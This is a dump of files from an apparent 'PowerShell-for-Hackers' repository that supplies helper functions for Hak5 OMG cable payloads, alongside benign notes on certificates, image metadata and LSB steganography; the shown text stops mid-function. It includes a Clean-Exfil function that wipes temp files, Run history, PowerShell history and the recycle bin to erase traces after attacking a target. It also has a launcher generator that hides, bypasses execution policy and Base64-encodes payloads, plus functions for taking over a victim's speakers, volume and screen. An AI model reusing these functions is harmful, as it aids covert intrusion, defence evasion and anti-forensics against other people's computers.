60 | 61 | -------------------------------------------------------------------------------- /VideoNotes/ImgDecon.md: -------------------------------------------------------------------------------- 1 | 2 | # Load required assemblies 3 | Add-Type -AssemblyName System.Windows.Forms 4 | Add-Type -AssemblyName System.Drawing 5 | 6 | # Function to get image metadata 7 | function Get-ImageMetadata { 8 | param ([string]$imagePath) 9 | 10 | $image = [System.Drawing.Image]::FromFile($imagePath) 11 | $metadata = @{ 12 | "Name" = [System.IO.Path]::GetFileName($imagePath) 13 | "FilePath" = $imagePath 14 | "Width" = $image.Width 15 | "Height" = $image.Height 16 | "Format" = $image.RawFormat.ToString() 17 | # Add more properties as needed 18 | } 19 | 20 | $image.Dispose() 21 | return $metadata 22 | } 23 | 24 | # Create the form with dark theme settings 25 | $form = New-Object System.Windows.Forms.Form 26 | $form.Text = 'Image Metadata Viewer' 27 | $form.Size = New-Object System.Drawing.Size(500, 600) # Adjusted form size 28 | $form.BackColor = [System.Drawing.Color]::FromArgb(45, 45, 48) # Dark background color 29 | $form.AutoScaleMode = 'Dpi' 30 | 31 | # Panel for the PictureBox 32 | $panel = New-Object System.Windows.Forms.Panel 33 | $panel.Size = New-Object System.Drawing.Size(470, 310) # Slightly larger than the PictureBox 34 | $panel.Location = New-Object System.Drawing.Point(15, 15) # Adjust location as needed 35 | $panel.BackColor = [System.Drawing.Color]::White # Border color 36 | $form.Controls.Add($panel) 37 | 38 | # PictureBox 39 | $pictureBox = New-Object System.Windows.Forms.PictureBox 40 | $pictureBox.Size = New-Object System.Drawing.Size(460, 300) # Set the PictureBox size 41 | $pictureBox.SizeMode = "Zoom" # Scale the image proportionally 42 | $pictureBox.Location = New-Object System.Drawing.Point(5, 5) # Adjust location to be inside the Panel 43 | $pictureBox.BackColor = [System.Drawing.Color]::Transparent # Optional, for PictureBox background 44 | 
$panel.Controls.Add($pictureBox) 45 | 46 | # Load and display image 47 | $imagePath = "C:\Users\micha\Desktop\zsec.png" # Use your specified image path 48 | $pictureBox.Image = [System.Drawing.Image]::FromFile($imagePath) 49 | 50 | # Get and display image metadata 51 | $metadata = Get-ImageMetadata -imagePath $imagePath 52 | $yPos = 340 53 | foreach ($key in $metadata.Keys) { 54 | $label = New-Object System.Windows.Forms.Label 55 | $label.Text = "${key}:" 56 | $label.Location = New-Object System.Drawing.Point(20, $yPos) 57 | $label.Size = New-Object System.Drawing.Size(80, 20) 58 | $label.ForeColor = [System.Drawing.Color]::White 59 | $form.Controls.Add($label) 60 | 61 | $textBox = New-Object System.Windows.Forms.TextBox 62 | $textBox.Text = $metadata[$key] 63 | $textBox.Location = New-Object System.Drawing.Point(100, $yPos) 64 | $textBox.Size = New-Object System.Drawing.Size(380, 20) 65 | $textBox.ReadOnly = $true 66 | $form.Controls.Add($textBox) 67 | 68 | $yPos += 30 69 | } 70 | 71 | # Show the form 72 | $form.ShowDialog() 73 | 74 | -------------------------------------------------------------------------------- /Functions/Minimize-Apps.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Minimize Apps 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |


## Description

A function to minimize all the apps on your targets screen

## The Function

### [Minimize-Apps]

A short description of how your function works

```powershell
Function Minimize-Apps
{
    # Shell.Application is the Windows Shell COM automation object;
    # its MinimizeAll() method is called once on a new instance.
    (New-Object -ComObject Shell.Application).MinimizeAll()
}
```


(back to top)

43 | 44 | 45 | ## Examples 46 | [//]: # (Examples of scripts that have used your function) 47 | Listed below are payloads that have used one of these functions: 48 | 49 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 50 | 51 | 52 |

(back to top)

53 | 54 | 55 | ## Contact 56 | 57 |

📱 My Socials 📱

58 |
59 | 60 | 61 | 67 | 73 | 79 | 85 | 86 |
62 | 63 | C# 64 | 65 |
YouTube 66 |
68 | 69 | Python 70 | 71 |
Twitter 72 |
74 | 75 | Golang 76 | 77 |
Instagram 78 |
80 | 81 | Jsonnet 82 | 83 |
Discord 84 |
87 |
88 | 89 | 90 | 91 |

(back to top)

92 | 93 | 94 | ## Acknowledgments 95 | 96 | * [Hak5](https://hak5.org/) 97 | * [UberGuidoZ](https://github.com/UberGuidoZ) 98 | 99 | *** 100 | 101 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 102 | 103 |

(back to top)

104 | -------------------------------------------------------------------------------- /VideoNotes/CertManagmentGuide.md: -------------------------------------------------------------------------------- 1 | # Certificate Management Guide 2 | 3 | This README provides an overview of how to create a self-signed certificate, export a certificate with its private key, transfer it securely, and import it on a recipient's system. This process is crucial for sharing certificates used for encryption and decryption, as well as for testing and development purposes. 4 | 5 | ## Table of Contents 6 | 7 | - [Creating Self-Signed Certificates](#creating-self-signed-certificates) 8 | - [Exporting Certificates](#exporting-certificates) 9 | - [Secure Transfer](#secure-transfer) 10 | - [Importing Certificates](#importing-certificates) 11 | - [Security Considerations](#security-considerations) 12 | 13 | ## Creating Self-Signed Certificates 14 | 15 | ### Steps to Create a Self-Signed Certificate 16 | 17 | 1. **Open PowerShell as Administrator**. 18 | 2. **Run the Command**: Use the following command to create a self-signed certificate: 19 | ```powershell 20 | $cert = New-SelfSignedCertificate -CertStoreLocation "cert:\CurrentUser\My" -KeyUsage KeyEncipherment, DataEncipherment -Type DocumentEncryptionCert -Subject "Document Encryption Certificate" 21 | 22 | 23 | # Certificate Management Guide 24 | 25 | This README provides an overview of how to export a certificate with its private key, transfer it securely, and import it on a recipient's system. This process is crucial for sharing certificates used for encryption and decryption. 26 | 27 | ## Table of Contents 28 | 29 | - [Exporting Certificates](#exporting-certificates) 30 | - [Secure Transfer](#secure-transfer) 31 | - [Importing Certificates](#importing-certificates) 32 | - [Security Considerations](#security-considerations) 33 | 34 | ## Exporting Certificates 35 | 36 | ### Steps to Export 37 | 38 | 1. 
**Open Certificate Manager**: Run `certmgr.msc`. 39 | 2. **Find Your Certificate**: Go to `Personal` -> `Certificates`. 40 | 3. **Export with Private Key**: Right-click the certificate, choose `All Tasks`, and then `Export...`. Include the private key. 41 | 4. **Set a Password**: Protect the private key with a strong password. 42 | 5. **Choose File Format**: Export as a PFX (.pfx) file. 43 | 6. **Save the Certificate**: Choose a secure location on your computer. 44 | 45 | ## Secure Transfer 46 | 47 | ### Guidelines for Transfer 48 | 49 | - **Method of Transfer**: Use encrypted email, secure file transfer services, or physical devices like USB drives. 50 | - **Password Transmission**: Send the password through a different channel for added security. 51 | 52 | ## Importing Certificates 53 | 54 | ### Steps to Import 55 | 56 | 1. **Open Certificate Manager**: On the recipient's computer, run `certmgr.msc`. 57 | 2. **Import Certificate**: Go to `Personal` -> `Certificates`, right-click, choose `All Tasks`, and then `Import...`. 58 | 3. **Locate the PFX File**: Select the transferred PFX file. 59 | 4. **Enter Password**: Provide the password set during the export process. 60 | 5. **Complete the Import**: Follow the wizard to add the certificate to the store. 61 | 62 | ## Security Considerations 63 | 64 | - **Handle Private Keys Carefully**: Private keys are critical for security. Keep them confidential. Once the import is confirmed, delete leftover copies of the PFX file from the transfer medium and any temporary locations, since each copy is only as safe as its password. 65 | - **Trust**: Only share certificates that include their private key (the PFX file) with trusted individuals or entities; the certificate alone holds only the public key. 66 | - **Compliance**: Adhere to organizational and legal policies for handling certificates. 
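---
*This guide is intended for informational purposes and does not constitute professional security advice.*

--------------------------------------------------------------------------------
/VideoNotes/Convert-ImageToAscii.ps1:
--------------------------------------------------------------------------------
function Convert-ImageToAscii {
    <#
    .SYNOPSIS
        Renders an image file as ASCII art and returns it as one string.
    .DESCRIPTION
        Loads the image with System.Drawing, scales it to Width x Height and maps each
        pixel's luminance (0.2126 R + 0.7152 G + 0.0722 B) onto a 16-symbol ramp.
        Every symbol is followed by a space and every row ends with a newline.
    .PARAMETER InFile
        Path of the image to convert.
    .PARAMETER Width
        Output width in symbols (CustomSize). When 0 or omitted it is derived from Height.
    .PARAMETER Height
        Output height in rows (CustomSize). When 0 or omitted it is derived from Width.
    .PARAMETER Invert
        Use the ramp that runs from ' ' (darkest) to '@' (brightest) instead of the reverse.
    .OUTPUTS
        System.String
    #>
    [CmdletBinding(DefaultParameterSetName = 'AutoSize')]
    param (
        [Parameter(Mandatory = $true)]
        [string] $InFile,

        [Parameter(Mandatory = $false, ParameterSetName = 'CustomSize')]
        [int] $Width,

        [Parameter(Mandatory = $false, ParameterSetName = 'CustomSize')]
        [int] $Height,

        [Parameter(Mandatory = $false)]
        [switch] $Invert
    )

    begin {
        # Add-Type replaces the deprecated Assembly.LoadWithPartialName call.
        Add-Type -AssemblyName System.Drawing

        $img = [System.Drawing.Image]::FromFile((Get-Item $InFile).FullName)
        $aspect = $img.Size.Width / $img.Size.Height

        if ($PSCmdlet.ParameterSetName -eq 'AutoSize') {
            # NOTE(review): the console height is multiplied by the aspect ratio and the
            # width by the ratio again; kept as written so existing output does not change.
            [int]$Height = $Host.UI.RawUI.WindowSize.Height * $aspect
            [int]$Width = $Height * $aspect
        } elseif ($Height -eq 0) {
            [int]$Height = $Width * ($img.Size.Height / $img.Size.Width)
        } elseif ($Width -eq 0) {
            [int]$Width = $Height * $aspect
        }
    }

    process {
        $bmp = New-Object System.Drawing.Bitmap($Width, $Height)

        $graph = [System.Drawing.Graphics]::FromImage($bmp)
        try {
            $graph.DrawImage($img, 0, 0, $Width, $Height)
        } finally {
            # Release the GDI+ handles even when drawing throws.
            $graph.Dispose()
            $img.Dispose()
        }

        if ($Invert) {
            $symbols = " .,:~+t?xmoX#M%@"
        } else {
            $symbols = "@%M#Xomx?t+~:,. "
        }

        # Upper brightness bound for symbols[0..14]; anything brighter gets symbols[15].
        # NOTE(review): 249 breaks the 16-step pattern (239 would be expected); kept to
        # preserve the original rendering.
        $bounds = 15, 31, 47, 63, 79, 95, 111, 127, 143, 159, 175, 191, 207, 223, 249

        # StringBuilder avoids re-copying the whole result for every pixel.
        $sb = New-Object System.Text.StringBuilder
        foreach ($row in 0..($bmp.Height - 1)) {
            foreach ($col in 0..($bmp.Width - 1)) {
                $px = $bmp.GetPixel($col, $row)
                $brightness = 0.2126 * $px.R + 0.7152 * $px.G + 0.0722 * $px.B

                $idx = 0
                while ($idx -lt $bounds.Count -and $brightness -gt $bounds[$idx]) { $idx++ }
                [void]$sb.Append($symbols[$idx]).Append(' ')
            }
            [void]$sb.Append("`n")
        }
    }

    end {
        # The original disposed $BitMap, a variable that is never assigned, so the real
        # bitmap leaked and an error was raised on every call. It also force-deleted
        # "$PSScriptRoot\temp.jpg", a file this function never creates; that deletion is
        # removed so an unrelated file of that name is left alone.
        $bmp.Dispose()

        $sb.ToString()
    }
}

--------------------------------------------------------------------------------
/Functions/PlaySound.md:
--------------------------------------------------------------------------------
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)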
14 | 15 | # PlaySound 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

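## Description

Play a sound file from the console window

## The Function

### [PlaySound]

Pass the path of the sound file into this function to have it play using the following syntax:
```
PlaySound "C:\Users\User\AppData\Local\Temp\sound.wav"
```

```
function PlaySound {
    <#
    .SYNOPSIS
        Plays a sound file and returns once playback has finished.
    .PARAMETER File
        Location of the sound file; assigned to SoundPlayer.SoundLocation.
    #>
    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)]
        [string]$File
    )

    $player = New-Object System.Media.SoundPlayer
    try {
        $player.SoundLocation = $File
        # PlaySync blocks the calling thread until the sound has been played.
        $player.PlaySync()
    }
    finally {
        # SoundPlayer is IDisposable; the original never released it, and a failed
        # load or playback would have skipped any cleanup placed after PlaySync.
        $player.Dispose()
    }
}
```
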


49 | 50 | 51 | ## Examples 52 | [//]: # (Examples of scripts that have used your function) 53 | Listed below are payloads that have used one of these functions: 54 | 55 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 56 | 57 | 58 |


59 | 60 | 61 | ## Contact 62 | 63 |


98 | 99 | 100 | ## Acknowledgments 101 | 102 | * [Hak5](https://hak5.org/) 103 | * [UberGuidoZ](https://github.com/UberGuidoZ) 104 | 105 | *** 106 | 107 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 108 | 109 |


110 | -------------------------------------------------------------------------------- /Functions/Speak.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Speak 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

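## Description

Speaks through your target's speakers

## The Function

### [Speak]

Using SAPI.SpVoice you will feed strings to the function to have it speak through your target's speakers using the following syntax

```
speak "you have been hacked"

```

```
function speak {
    <#
    .SYNOPSIS
        Reads a sentence aloud through the SAPI.SpVoice COM object.
    .PARAMETER Sentence
        Text to speak.
    #>
    [CmdletBinding()]
    param (
        [Parameter (Position=0,Mandatory = $True,ValueFromPipeline=$true)]
        [string]$Sentence
    )

    # The voice object has to exist before its properties are used. The original
    # read $s.GetVoices() one line before $s was created, which fails on a null value.
    $s = New-Object -ComObject SAPI.SpVoice
    $s.Voice = $s.GetVoices().Item(0)
    $s.Rate = -2
    $s.Speak($Sentence)
}
```
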


56 | 57 | 58 | ## Examples 59 | 60 | Listed below are payloads that have used one of these functions: 61 | 62 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 63 | 64 | [We-Found-You](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-We-Found-You) 65 | 66 | 67 |


68 | 69 | 70 | ## Contact 71 | 72 |


107 | 108 | 109 | ## Acknowledgments 110 | 111 | * [Hak5](https://hak5.org/) 112 | * [UberGuidoZ](https://github.com/UberGuidoZ) 113 | 114 | *** 115 | 116 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 117 | 118 |


119 | -------------------------------------------------------------------------------- /Functions/Clean-Exfil.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Clean-Exfil 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

## Description

This function is to erase any trace of you after wreaking havoc on your target

## The Function

### [Clean-Exfil]

You will Delete contents of Temp folder, Delete run box history, Delete powershell history, and Deletes contents of recycle bin

```
function Clean-Exfil {
    # Deletes four per-user artifacts: the contents of %TEMP%, the Run dialog MRU
    # values, the PSReadLine history file and the recycle bin contents. These four
    # statements are the whole function, so the scope is narrower than the
    # description's "erase any trace".
    # NOTE(review): for responders, an empty RunMRU key together with a missing
    # PSReadLine history file is presumably itself worth treating as an indicator.

    # empty temp folder
    rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue

    # delete run box history
    # reg is an external program, so this step runs as a child process with the key
    # path on its command line.
    reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

    # Delete powershell history
    # No -ErrorAction is given here, unlike the deletions around it, so a failure of
    # this step is reported instead of suppressed.
    Remove-Item (Get-PSreadlineOption).HistorySavePath

    # Empty recycle bin
    Clear-RecycleBin -Force -ErrorAction SilentlyContinue

}
```



53 | 54 | 55 | ## Examples 56 | 57 | Listed below are payloads that have used one of these functions: 58 | 59 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 60 | 61 | [ET-Phone-Home](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home) 62 | 63 | [AcidBurn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 64 | 65 | 66 |


67 | 68 | 69 | ## Contact 70 | 71 |


106 | 107 | 108 | ## Acknowledgments 109 | 110 | * [Hak5](https://hak5.org/) 111 | * [UberGuidoZ](https://github.com/UberGuidoZ) 112 | 113 | *** 114 | 115 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 116 | 117 |


118 | -------------------------------------------------------------------------------- /Functions/Hide-Msg.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Hide Message 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

## Description

This function can be used to hide a secret message in an image

## The Function

### [Hide-Msg]

In this function you will provide the path of your image and your secret message using the syntax below

```
Hide-Msg -Path "C:\Users\user\Desktop\secret.jpg" -Message "this is your secret message"
```

```
function Hide-Msg {
    <#
    .SYNOPSIS
        Appends a text message to the end of an image file.
    .DESCRIPTION
        The message is written to a scratch file on the Desktop, concatenated onto the
        image with "copy /b", and the scratch file is then removed. The text is appended
        as-is after the image data: it is neither encrypted nor embedded in the pixels,
        so anyone who inspects the file's trailing bytes can read it.
    .PARAMETER Path
        Image file to append to. It is overwritten in place.
    .PARAMETER Message
        Text to append.
    #>
    [CmdletBinding()]
    param (

        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [string]$Path,

        [Parameter (Mandatory = $False)]
        [string]$Message
    )

    # Fixed scratch location; an existing file of this name is overwritten.
    $scratch = "$Env:USERPROFILE\Desktop\foo.txt"

    Write-Output "`n`n $Message" > $scratch

    # Binary concatenation: image + scratch file, written back over the image.
    cmd.exe /c copy /b "$Path" + "$scratch" "$Path"

    Remove-Item $scratch -Recurse -Force -ErrorAction SilentlyContinue

}
```



61 | 62 | 63 | ## Examples 64 | 65 | Listed below are payloads that have used one of these functions: 66 | 67 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 68 | 69 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 70 | 71 | 72 |


73 | 74 | 75 | ## Contact 76 | 77 |


112 | 113 | 114 | ## Acknowledgments 115 | 116 | * [Hak5](https://hak5.org/) 117 | * [UberGuidoZ](https://github.com/UberGuidoZ) 118 | 119 | *** 120 | 121 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 122 | 123 |


124 | -------------------------------------------------------------------------------- /VideoNotes/lsbSteggo.md: -------------------------------------------------------------------------------- 1 | # Least Significant Bit (LSB) Manipulation in Steganography 2 | 3 | ## Overview 4 | Least Significant Bit (LSB) manipulation is a steganography technique used to hide information within digital images. It leverages the principle that minor changes in pixel values are usually imperceptible to the human eye. 5 | 6 | ## Understanding Pixels and Binary Representation 7 | 8 | ### Pixel Composition 9 | - **Color Channels**: Each pixel in a color image is composed of color channels – Red, Green, and Blue (RGB). 10 | - **Bit Depth**: Commonly, each channel is represented by 8 bits, resulting in 24 bits per pixel. 11 | 12 | ### Significance of Bits 13 | - **MSB vs. LSB**: In an 8-bit value, the Most Significant Bit (MSB) holds the highest value, whereas the Least Significant Bit (LSB) has the lowest. 14 | - **Influence on Color**: Altering the MSB changes the color significantly, but changes to the LSB are subtle. 15 | 16 | ## The LSB Steganography Process 17 | 18 | ### Data Preparation 19 | 1. **Binary Conversion**: Convert the data to be hidden into binary format. 20 | 2. **Pixel Selection**: Choose pixels in the image to store the data. 21 | 22 | ### Embedding Process 23 | 1. **Replacing LSBs**: Replace the LSB of each selected pixel's color value with a bit from the binary data. 24 | 2. **Sequential Embedding**: Follow a predetermined sequence to embed data bits across the image's pixels. 25 | 3. **Channel Variation**: Optionally vary which color channel's LSB is altered to enhance complexity. 26 | 27 | ### Extracting Process 28 | 1. **Identifying Pixels**: Locate the pixels used for data embedding. 29 | 2. **Reading LSBs**: Extract the LSB from each relevant pixel to reconstruct the binary data. 30 | 3. 
**Binary to Data**: Convert the binary sequence back to its original format (text, image, etc.). 31 | 32 | ## Example Scenario 33 | 34 | ### Embedding "Hello" 35 | 1. **ASCII Conversion**: Convert "Hello" to binary (ASCII). 36 | 2. **Image Selection**: Choose an image with sufficient pixels. 37 | 3. **Embedding**: Replace LSBs of pixels with binary data of "Hello". 38 | 4. **Saving**: Store the modified image. 39 | 40 | ### Extraction 41 | 1. **Identify Pixels**: Know which pixels were used. 42 | 2. **Extract LSBs**: Read LSBs in sequence to get the binary data. 43 | 3. **Decode**: Convert binary back to text. 44 | 45 | ## Technical Considerations 46 | 47 | ### Image Formats 48 | - **Lossless Formats**: Prefer formats like PNG or BMP for their non-altering nature. 49 | - **Avoiding Lossy Formats**: Formats like JPEG can corrupt the hidden data due to compression. 50 | 51 | ### Capacity and Limitations 52 | - **Data Size**: Limited by the number of pixels in the image. 53 | - **Image Size**: Larger images can conceal more data. 54 | 55 | ### Robustness and Vulnerability 56 | - **Manipulation Susceptibility**: Vulnerable to image alterations like cropping or resizing. 57 | - **Format Conversion**: Changing the format can disrupt the hidden data. 58 | 59 | ## Detection and Analysis 60 | 61 | ### Visual Detection 62 | - **Human Eye Limitation**: Difficult to detect changes with the naked eye. 63 | 64 | ### Statistical Analysis 65 | - **Detecting Anomalies**: Statistical tools can reveal irregularities in pixel value distributions. 66 | 67 | ## Scripting for LSB Steganography 68 | 69 | ### Required Understanding 70 | - **Image Encoding**: Knowledge of how images are encoded in binary. 71 | - **Binary Manipulation**: Skills in handling binary data. 72 | - **Image Processing Libraries**: Familiarity with libraries like PIL in Python. 73 | 74 | ### Script Components 75 | 1. **Image Reading**: Open and read pixel values. 76 | 2. 
**Data Embedding**: Alter LSBs according to the secret data. 77 | 3. **Image Saving**: Store the modified image. 78 | 79 | ## Conclusion 80 | LSB manipulation in steganography is a nuanced technique requiring an understanding of image processing and binary data manipulation. While it's effective for covert information hiding, it demands careful consideration of image formats, data capacity, and potential vulnerabilities. 81 | -------------------------------------------------------------------------------- /Functions/PowerShell-2-Batch.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # PowerShell-2-Batch 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

## Description

This function will convert a PowerShell script to a Batch file

## The Function

### [PowerShell-2-Batch]

Using this function will convert your powershell payload over to Base64 and then change the extension on it to be a .BAT file
Make the conversion with this function using the following syntax:

```
P2B -Path "C:\Users\User\Desktop\example.ps1"

or

"C:\Users\User\Desktop\example.ps1" | P2B
```

```
function P2B {
    # Writes a .bat launcher next to the input script. The launcher carries the script
    # text, Base64-encoded, as the -enc argument of a powershell command line; the
    # original .ps1 is left in place.
    param
    (
        [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [string]
        $Path
    )

    process
    {
        # The file is read as UTF-8 and re-encoded as UTF-16LE bytes ("Unicode") before
        # Base64, which is the form powershell's -enc parameter decodes.
        $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $Path -Raw -Encoding UTF8)))
        # Same directory and base name as the input, with the extension swapped to .bat.
        $newPath = [Io.Path]::ChangeExtension($Path, ".bat")
        # Launcher switches as written: -w h (hidden window), -NoP (no profile),
        # -NonI (non-interactive), -Exec Bypass (execution policy bypassed for this process).
        # Base64 is an encoding, not protection: the script is recovered by decoding the
        # -enc value, and the whole command line is visible to process-creation logging.
        "@echo off`npowershell -w h -NoP -NonI -Exec Bypass -enc $encoded" | Set-Content -Path $newPath -Encoding Ascii
    }
}
```



62 | 63 | 64 | ## Examples 65 | 66 | Listed below are payloads that have used one of these functions: 67 | 68 | No payloads have made use of this function yet, please feel free to contact me to get your payload featured here if you do use it 69 | 70 | 71 |


72 | 73 | 74 | ## Contact 75 | 76 |


111 | 112 | 113 | ## Acknowledgments 114 | 115 | * [Hak5](https://hak5.org/) 116 | * [UberGuidoZ](https://github.com/UberGuidoZ) 117 | 118 | *** 119 | 120 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 121 | 122 |


123 | -------------------------------------------------------------------------------- /Functions/Set-Volume.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Set Volume 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

## Description

This function can be used to set the volume of your target's PC

## The Function

### [Set-Volume]

In this function we will create an object to allow us to use the Send Keys method to either raise or lower the volume using the following syntax
```
Set-Volume 50
```

```
Function Set-Volume
{
    <#
    .SYNOPSIS
        Sets the volume by sending key codes 174 and 175 through WScript.Shell.
    .PARAMETER volume
        Requested level, 0 to 100.
    #>
    Param(
        [Parameter(Mandatory=$true)]
        [ValidateRange(0,100)]
        [Int]
        $volume
    )

    $lowerKey = [char] 174
    $raiseKey = [char] 175

    # The Windows Shell object provides SendKeys.
    $shell = New-Object -ComObject WScript.Shell

    # Fifty "lower" presses first, so the climb below starts from zero.
    foreach ($press in 1..50) { $shell.SendKeys( $lowerKey ) }

    # One "raise" press per two units requested, rounded up.
    $remaining = [Math]::Ceiling( $volume / 2 )
    while ( $remaining -gt 0 )
    {
        $shell.SendKeys( $raiseKey )
        $remaining--
    }
}
```



65 | 66 | 67 | ## Examples 68 | 69 | Listed below are payloads that have used one of these functions: 70 | 71 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 72 | 73 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 74 | 75 | 76 |


77 | 78 | 79 | ## Contact 80 | 81 |


116 | 117 | 118 | ## Acknowledgments 119 | 120 | * [Hak5](https://hak5.org/) 121 | * [UberGuidoZ](https://github.com/UberGuidoZ) 122 | 123 | *** 124 | 125 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 126 | 127 |


128 | -------------------------------------------------------------------------------- /Functions/If-Admin.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # If-Admin 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

## Description

These functions are used to determine if you have Admin level privileges

## The Function

### [If-Admin-Window]

This function will let you know if you are currently in an Admin Privilege Level window

```
function If-Admin-Window {
    # Reports whether the current process identity is in the built-in Administrator
    # role. The result is written to the host as coloured text; nothing is returned.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal $identity

    if ($principal.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) {
        Write-host 'Is Admin Window' -BackgroundColor DarkRed -ForegroundColor White
        return
    }
    Write-host 'Not Admin Window' -BackgroundColor DarkBlue -ForegroundColor White
}
```

### [If-Admin]

This function will run the current user against LocalGroupMember to return True or False if Profile has Admin Privileges

```
function If-Admin {
    # Reports whether COMPUTERNAME\USERNAME is listed in the local Administrators
    # group. The result is written to the host as coloured text; nothing is returned.
    # NOTE(review): the comparison is against the group's direct member names, so a
    # domain account (DOMAIN\user) or membership through a nested group would
    # presumably report 'Not Admin' - confirm before relying on it.
    $account = "$env:COMPUTERNAME\$env:USERNAME"
    $members = (Get-LocalGroupMember 'Administrators').Name

    if ($members -contains $account) {
        Write-host 'Is Admin' -BackgroundColor DarkRed -ForegroundColor White
        return
    }
    Write-host 'Not Admin' -BackgroundColor DarkBlue -ForegroundColor White
}
```



66 | 67 | 68 | ## Examples 69 | 70 | Listed below are payloads that have used one of these functions: 71 | 72 | No current Examples to show. Please feel free to submit your own payload of you using this function 73 | 74 | 75 |


76 | 77 | 78 | ## Contact 79 | 80 |


115 | 116 | 117 | ## Acknowledgments 118 | 119 | * [Hak5](https://hak5.org/) 120 | * [UberGuidoZ](https://github.com/UberGuidoZ) 121 | 122 | *** 123 | 124 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 125 | 126 |


127 | -------------------------------------------------------------------------------- /Functions/MsgBox.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # MsgBox 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

## Description

This function will make a generic pop up message box

## The Function

### [MsgBox]

The title, button, and image parameters are optional.

You can use tab completion on the button and image parameter

Generate a Message Box pop up using the following syntax:

```
MsgBox -message 'this is the message body' -title "this is the title" -button OKCancel -image Warning

or

MsgBox -m 'this is the message body' -t "this is the title" -b OKCancel -i Warning
```

```
function MsgBox {
    <#
    .SYNOPSIS
        Shows a WPF message box and outputs the value returned by MessageBox.Show.
    .PARAMETER message
        Body text (alias m).
    .PARAMETER title
        Caption (alias t). A single space is used when omitted.
    .PARAMETER button
        Button set (alias b): OK, OKCancel, YesNoCancel or YesNo. OK when omitted.
    .PARAMETER image
        Icon (alias i): None, Hand, Question, Warning or Asterisk. None when omitted.
    #>
    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True)]
        [Alias("m")]
        [string]$message,

